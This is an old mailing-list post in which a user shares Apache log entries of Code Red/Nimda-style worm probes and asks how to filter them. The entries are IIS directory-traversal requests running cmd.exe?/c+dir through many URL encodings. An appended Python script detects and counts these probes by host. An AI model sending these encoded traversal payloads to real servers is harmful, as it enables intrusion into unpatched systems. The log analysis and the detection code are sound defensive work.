Cleaning up httpd access logs


Subject: Cleaning up httpd access logs
From: Zeke Runyon (zrunyon@mac.com)
Date: Fri Dec 21 2001 - 18:22:30 MST


My /var/log/httpd/access_log is cluttered with around 50 hits of strange
Code Red and other Windows virus requests, like:

65.31.216.17 - - [21/Dec/2001:06:11:29 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 274
65.31.216.17 - - [21/Dec/2001:06:11:30 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.216.17 - - [21/Dec/2001:06:11:31 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.216.17 - - [21/Dec/2001:06:11:32 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.216.17 - - [21/Dec/2001:06:11:35 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.216.17 - - [21/Dec/2001:06:11:39 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.216.17 - - [21/Dec/2001:06:11:43 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 331
65.31.216.17 - - [21/Dec/2001:06:11:43 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:44 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:48 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:48 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
65.31.216.17 - - [21/Dec/2001:06:11:49 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
65.31.216.17 - - [21/Dec/2001:06:11:49 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
65.31.216.17 - - [21/Dec/2001:06:11:50 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.216.17 - - [21/Dec/2001:06:11:51 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.88.52 - - [21/Dec/2001:06:26:15 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0"404 276
65.31.88.52 - - [21/Dec/2001:06:26:18 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274
65.31.88.52 - - [21/Dec/2001:06:26:22 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.88.52 - - [21/Dec/2001:06:26:26 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
65.31.88.52 - - [21/Dec/2001:06:26:33 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.31.88.52 - - [21/Dec/2001:06:26:37 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
65.31.88.52 - - [21/Dec/2001:06:26:40 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315

Do any of you know/have written a good script to filter these out or
know how to prevent the requests from reaching my machine?

                            ##
# Zeke Runyon | zrunyon@mac.com | zekeworld.home.dhs.org
# blog: communistsquirrel.home.dhs.org
# Mac OS X 10.1.1 5M28 | OS 9.2.1 | Yellow Dog Linux 2.1
# Communist squirrels shall rule the world.
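
One way to do the filtering asked about above, as an added example that is not part of the original post: it splits Common Log Format lines into ordinary traffic and worm probes, decoding the path repeatedly so that double-encoded forms such as ..%255c.. are recognised. All function names are hypothetical, the probe lines in SAMPLE are taken from the post with the mail wrapping undone, and the 192.0.2.10 lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
# (the space after the closing quote is optional, as in one line of the post)
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" ?(\d{3}) (\S+)$')
# Decoded path ends in cmd.exe/root.exe, or contains a ../ or ..\ traversal.
PROBE = re.compile(r'(?:^|[/\\])(?:cmd|root)\.exe$|\.\.[/\\]', re.I)

def decode_fully(path, rounds=5):
    """Percent-decode until stable so %255c and %25%35%63 both become a backslash."""
    for _ in range(rounds):
        nxt = unquote(path, encoding="latin-1")
        if nxt == path:
            break
        path = nxt
    return path

def is_probe(request):
    """request is the quoted field, e.g. 'GET /path?query HTTP/1.0'."""
    parts = request.split()
    if len(parts) < 2:
        return False
    return bool(PROBE.search(decode_fully(parts[1].split("?", 1)[0])))

def split_log(lines):
    """Return (kept_lines, probe_count_by_host); unparsable lines are kept."""
    kept, hosts = [], Counter()
    for line in lines:
        m = CLF.match(line.rstrip("\n"))
        if m and is_probe(m.group(2)):
            hosts[m.group(1)] += 1
        else:
            kept.append(line)
    return kept, hosts

SAMPLE = [  # 192.0.2.10 lines are constructed; the rest are from the post
    '192.0.2.10 - - [21/Dec/2001:06:10:02 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '65.31.216.17 - - [21/Dec/2001:06:11:32 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298',
    '65.31.216.17 - - [21/Dec/2001:06:11:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281',
    '65.31.88.52 - - [21/Dec/2001:06:26:15 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0"404 276',
    '192.0.2.10 - - [21/Dec/2001:06:30:41 -0500] "GET /blog/ HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    kept, hosts = split_log(SAMPLE)
    print("\n".join(kept))
    for host, n in hosts.most_common():
        print(f"# filtered {n} probe(s) from {host}")
```

The per-host counts are kept rather than thrown away so the filtered requests can still be reviewed or fed to a block list.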


